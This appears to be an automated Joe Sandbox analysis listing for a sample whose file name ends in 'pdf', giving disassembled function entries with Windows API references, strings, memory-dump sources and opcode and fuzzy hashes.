Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: strcmp
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
API String ID: 1004003707-1294421646
Opcode ID: 9f48f247fa4fa9e2f534720a79f0d2c8b2d0a9fec0043785daeb0896107b0a84
Instruction ID: 7ec116c0869f84356b6bde659ccd35c6cd713230168417523e51ad2e99cdf3eb
Opcode Fuzzy Hash: 9f48f247fa4fa9e2f534720a79f0d2c8b2d0a9fec0043785daeb0896107b0a84
Instruction Fuzzy Hash: F7629360D0EE8794EA08FB9DA8508BDAB61AFD5784BC49177C44C47262DE6CA16BC370

Function 00007FF7D7862060 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7D786209C
GetCurrentProcess.KERNEL32 ref: 00007FF7D78620C4
OpenProcessToken.ADVAPI32 ref: 00007FF7D78620D7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7D78620FC
GetLastError.KERNEL32 ref: 00007FF7D7862104
CloseHandle.KERNEL32 ref: 00007FF7D7862111
GetLargePageMinimum.KERNEL32 ref: 00007FF7D7862126
VirtualAlloc.KERNEL32 ref: 00007FF7D7862157
GetCurrentProcess.KERNEL32 ref: 00007FF7D7862163
VirtualAllocExNuma.KERNEL32 ref: 00007FF7D7862183

Strings

SeLockMemoryPrivilege, xrefs: 00007FF7D7862095

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
String ID: SeLockMemoryPrivilege
API String ID: 1752251271-475654710
Opcode ID: b7dd7f4e0941cebf7b978850b74baf52bdf20ec9be2a5aa017f46605c0fa4153
Instruction ID: 9aa5152b03eebbfe29ce4fa01e98a94e3cf2091b654c1bdd4818bf892f101d20
Opcode Fuzzy Hash: b7dd7f4e0941cebf7b978850b74baf52bdf20ec9be2a5aa017f46605c0fa4153
Instruction Fuzzy Hash: 7531B672B1CA4395FB20AF61B84476EEBA1FB94B88FC44036DA4D47755DE3CE0468B10

Function 00007FF7D788AFE0 Relevance: 10.9, APIs: 7, Instructions: 376COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF7D7889ADB), ref: 00007FF7D788B139
EnterCriticalSection.KERNEL32 ref: 00007FF7D788B466
LeaveCriticalSection.KERNEL32 ref: 00007FF7D788B480
DebugBreak.KERNEL32 ref: 00007FF7D788B52D
DebugBreak.KERNEL32 ref: 00007FF7D788B54A
DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF7D7889ADB), ref: 00007FF7D788B565
DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF7D7889ADB), ref: 00007FF7D788B57E

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: BreakDebug$CriticalSection$EnterLeave
String ID:
API String ID: 3888577265-0
Opcode ID: ab87b12a6a5306c835b84ea241621a0749a8db9e8494153499f4f1ab9ce7c5cf
Instruction ID: b1f9af83581bd07afb2d134b65b46870bfb681d4ff5bc06f1acac50a538e98ec
Opcode Fuzzy Hash: ab87b12a6a5306c835b84ea241621a0749a8db9e8494153499f4f1ab9ce7c5cf
Instruction Fuzzy Hash: 6F029262A09B8682EB55AB25E44077CAFE0FF84B84FD44137CA4D477A1DF3CE4628360

Function 00007FF7D7857250 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7D7857BA0), ref: 00007FF7D7857307
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7D7857BA0), ref: 00007FF7D7857451
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7D7857BA0), ref: 00007FF7D7857533
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7D7857BA0), ref: 00007FF7D7857549
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7D7857BA0), ref: 00007FF7D78575BE

Strings

[ KeepUnwinding ], xrefs: 00007FF7D785755D

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: [ KeepUnwinding ]
API String ID: 2546344036-400895726
Opcode ID: 77c21dccad136bf8c76a98f93902b634908422d1eb04a4048374bad58fca1ff8
Instruction ID: c901e49648e7d919b7ec683ec02b92c6c6152bc51160f051fa197ecc6bf6f589
Opcode Fuzzy Hash: 77c21dccad136bf8c76a98f93902b634908422d1eb04a4048374bad58fca1ff8
Instruction Fuzzy Hash: DBB17F32A09B4281EB94AF25D4816ED7BA5FB44B58FD88137CE4D47398DF39E466C320

Function 00007FF7D788DB50 Relevance: 3.3, APIs: 2, Instructions: 326threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF7D788DC95
SwitchToThread.KERNEL32 ref: 00007FF7D788DCC5

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 54b8823fd12c333ac504187e33205b4df160fa3a8ca6a5f8b07ae845c32d57bd
Instruction ID: 2f19af37f18998d61734edcd27987a562aa44d943504cbd19c0fe3c97e41edd0
Opcode Fuzzy Hash: 54b8823fd12c333ac504187e33205b4df160fa3a8ca6a5f8b07ae845c32d57bd
Instruction Fuzzy Hash: 36D1B232A0868586EB64AB15E44076DFBA1FB887A4FC44233DA9D47789DF7CE452C730

Function 00007FF7D7860CA0 Relevance: 3.2, APIs: 2, Instructions: 162COMMON

Download Yara Rule

APIs

GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF7D7855076,?,?,?,?,?,?,00007FF7D78524A0), ref: 00007FF7D7860D61
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF7D7855076,?,?,?,?,?,?,00007FF7D78524A0), ref: 00007FF7D7860DC0

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: EnabledFeaturesState
String ID:
API String ID: 1557480591-0
Opcode ID: 0916c6ec2eebc56cc230c8ed5b02d8d8e4227e682f8c722e5bb9088faa9d8091
Instruction ID: 5cfb2e5f98bef46f0271df123b39be14d8e790a2ed76141fa9edf4d654cd7235
Opcode Fuzzy Hash: 0916c6ec2eebc56cc230c8ed5b02d8d8e4227e682f8c722e5bb9088faa9d8091
Instruction Fuzzy Hash: 9651797BF0C26A16FF6910598059B7D8A839B92354FC5C93ACA4E432C1CD7FE823421C

Function 00007FF7D7884BC0 Relevance: 2.2, Strings: 1, Instructions: 955COMMON

Download Yara Rule

Strings

*, xrefs: 00007FF7D7885914, 00007FF7D7885A20

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID: *
API String ID: 0-3160374680
Opcode ID: 810fe162e102f40e206cd181bd6a083c3d639cfc3960fc0453e99a7fbef3a661
Instruction ID: 315dc0b1134f2122f1bde3d75d82430b09f7729d5580af5a01df861f365124a7
Opcode Fuzzy Hash: 810fe162e102f40e206cd181bd6a083c3d639cfc3960fc0453e99a7fbef3a661
Instruction Fuzzy Hash: 4F92D261A18A4685EB49FB19E851ABCEB91BF88BC4FC44137D84E57361EF3CE4538320

Function 00007FF7D7858A20 Relevance: 2.1, Strings: 1, Instructions: 834COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF7D7858AEE

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
Instruction ID: f7027c65180f12038c4c65af1ee8400e5f68ba5382216c229631e2289d4e7681
Opcode Fuzzy Hash: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
Instruction Fuzzy Hash: 5162D4B2A15B1187EB089F29C45576D7BA6FB94B88FC58136CA0D43798DF38D921C780

Function 00007FF7D7880600 Relevance: 1.9, APIs: 1, Instructions: 439COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D7861480: CreateEventW.KERNEL32 ref: 00007FF7D78614C1

Part of subcall function 00007FF7D7861E60: QueryPerformanceCounter.KERNEL32 ref: 00007FF7D7861E69

DebugBreak.KERNEL32 ref: 00007FF7D7880DBA

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: BreakCounterCreateDebugEventPerformanceQuery
String ID:
API String ID: 4239280443-0
Opcode ID: 44f9c72806ed8735fc5d0d980f64e314303c0ef2081f6e61e366a740387962d5
Instruction ID: ab26b4f9ec53c6dc5d85dbe44710a2771ad144272bcb9302b89921e2cf93e894
Opcode Fuzzy Hash: 44f9c72806ed8735fc5d0d980f64e314303c0ef2081f6e61e366a740387962d5
Instruction Fuzzy Hash: 7F420E31D19B8285E758AB28F881A6DB7E4FFC4744FD0423AD9CC16765DF3CA1A29360

Function 00007FF7D793F0A0 Relevance: 1.8, APIs: 1, Instructions: 347COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 00007FF7D793F30D

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: 8ab7fe87637b62ee2910872e64c8e62ca75e74467035a7d06776735da11cdac6
Instruction ID: c5cb6372c22e8a45edac8e8f5acb5a9b8acfccc8a3b81fff7b0ae544ea63a2cb
Opcode Fuzzy Hash: 8ab7fe87637b62ee2910872e64c8e62ca75e74467035a7d06776735da11cdac6
Instruction Fuzzy Hash: 33D1AD23A08A4796EB14FB65D444A7DA7A2BB40B8CFD14037DE1E47699DF38E843C360

Function 00007FF7D7883DF0 Relevance: 1.8, Strings: 1, Instructions: 572COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7D788434C

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 40c05e7c02e8f861b88b76b598b5f1b1f275c03d962268532b7eac74ac26404c
Instruction ID: 7a9dc5dffa2b55fce3d50314682e441ad071a8bcb584ebb283f693ab15ca6dd9
Opcode Fuzzy Hash: 40c05e7c02e8f861b88b76b598b5f1b1f275c03d962268532b7eac74ac26404c
Instruction Fuzzy Hash: 0742A772A19A8685EA14AF19F40067DBBA5FB857A4FC54233CA6D477D0DF3CE462C320

Function 00007FF7D786F0D0 Relevance: 1.7, Strings: 1, Instructions: 440COMMON

Download Yara Rule

Strings

?, xrefs: 00007FF7D786F11B

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: e4d80b9cebc9bab2ced9e927944ccf335baed3053e9f98ab8b78e7f2f163c95c
Instruction ID: d5685e1e810bd68e8952e4a0013693896d74075bf63f50e0976c3d920c33702d
Opcode Fuzzy Hash: e4d80b9cebc9bab2ced9e927944ccf335baed3053e9f98ab8b78e7f2f163c95c
Instruction Fuzzy Hash: 3E12D532A18A4292EA14EB15E444B7DBBA5FB94B94FD48233DE5D47794CF3CE062C710

Function 00007FF7D78EB900 Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF7D78EC9D0

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b796071e68d80ead1d9b26efef2d19b56b010b8338d6773dc79756cdc2f84507
Instruction ID: 99b5bce3ee259b2446bdca776cb12ddde7fcfa4be8ffeb62c92e448e6c950668
Opcode Fuzzy Hash: b796071e68d80ead1d9b26efef2d19b56b010b8338d6773dc79756cdc2f84507
Instruction Fuzzy Hash: E331A073F0965199F761AAA5AC407FDAEA0AB44368FE84037DE0D56684EF3C58E3C310

Function 00007FF7D7860860 Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7D7855059,?,?,?,?,?,?,00007FF7D78524A0), ref: 00007FF7D786092C

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: fe39d5fcb2a284a994cabbf5a730fac26149864b999e17e36e05a62158092133
Instruction ID: 92cd9316d2e7be6ec640da2e0b472e9df869004ca6128359f941b8de7c41739a
Opcode Fuzzy Hash: fe39d5fcb2a284a994cabbf5a730fac26149864b999e17e36e05a62158092133
Instruction Fuzzy Hash: 83213031D0DB4286E748AB29E84166DB7A0FBA8340FD0A137D54D43B51DF7CE596C750

Function 00007FF7D78EC960 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF7D78EC9D0

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ec1ef8317ac1b64eacdaf434a824290fa9ffa16ffd226f534d1a60bccf0cee45
Instruction ID: d19aa3137d7ec0071abd4bf8fba4b08a362cf76de5cfaa1bc6f7e43b1f04a293
Opcode Fuzzy Hash: ec1ef8317ac1b64eacdaf434a824290fa9ffa16ffd226f534d1a60bccf0cee45
Instruction Fuzzy Hash: D2015A73F006609DF760EBA1EC00ADD7BB4BB04358FA0402ADE0C66A08DF3494A7C700

Function 00007FF7D7868900 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

*, xrefs: 00007FF7D7868A70

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID: *
API String ID: 0-3160374680
Opcode ID: 169a63cb6aadc384e1eecad694e223842e44c424ebead5ce33918dc2f1a9c000
Instruction ID: 9850dca4787364721e4164c3182af2a27bbca0531acdbe11f9062c521a14ccb7
Opcode Fuzzy Hash: 169a63cb6aadc384e1eecad694e223842e44c424ebead5ce33918dc2f1a9c000
Instruction Fuzzy Hash: DB410571F2875A51E909A73B9541A3CD5925F993D0FE8C733DC6E2A3C1EF2DB0A24210

